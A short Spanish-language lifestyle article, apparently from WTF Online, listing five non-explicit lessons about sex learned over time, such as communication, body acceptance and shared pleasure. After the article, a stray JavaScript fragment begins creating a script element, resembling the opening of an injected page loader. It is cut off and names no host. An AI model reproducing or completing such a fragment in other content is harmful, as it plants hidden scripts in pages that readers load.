5 cosas sexuales que aprendes con el tiempo

Por Elizabeth Palacios    @ely__palacios

Cuando hablamos de sexo, muchas veces profundizamos o nos clavamos en cosas muy perfeccionistas, que en lo cotidiano no son tan importantes.

En el sexo, como en la vida misma, la experiencia te hace mejorar en todos sentidos, las técnicas, las palabras, las formas, los modos.

Pero existen cosas que pocas veces te las dirán, quizá por lo obvias que pueden parecer, sin embargo, en WTF Online sí te las diremos.

Estas son 5 cosas sexuales que aprendes con el tiempo:

Lo clásico también es chido

Mucho hacemos de menos al clásico misionero o posiciones sexuales básicas o clásicas, pero no por eso son malas, todo lo contrario, quizá tus mejores recuerdos sexuales incluyan estos famosos clásicos.

La comunicación es la base

Tener sexo sensacional se debe a la buena comunicación que debe existir en la pareja, cuando existe este factor, se expresa lo que se gusta, lo que se desea, lo que se necesita, con detalles y sin tapujos, por lo que el resultado es maravilloso.

Cuerpos perfectos

Los fantasmas que tenemos en la cabeza, a veces nos hacen sentir mal por pequeñeces, que si estamos gord@s, chaparr@s, vellud@s… Con el tiempo comprendes que nuestros cuerpos son perfectos tal y como están, que tenemos lo necesario para poder dar y recibir placer sin problemas.

El buen sexo no siempre termina en orgasmo

Si bien, el orgasmo es lo más buscado del sexo, cuando tienes encuentros sexuales llenos de magia, química y seducción, donde ambos están completamente entregados al otro y gozando del momento, no es necesario llegar al orgasmo para disfrutar de las prácticas sexuales que se acostumbren realizar.

El placer es responsabilidad de los 2

El sexo implica la voluntad y empeño cada miembro de la pareja, así como los orgasmos, ambos son responsables de culminar de la mejor manera sus encuentros sexuales, ambos deben estar al 100 enfocados en ese momento y dando todo de sí, entregándose por completo al otro.

var d=document;var s=d.createElement(‘script’);

:)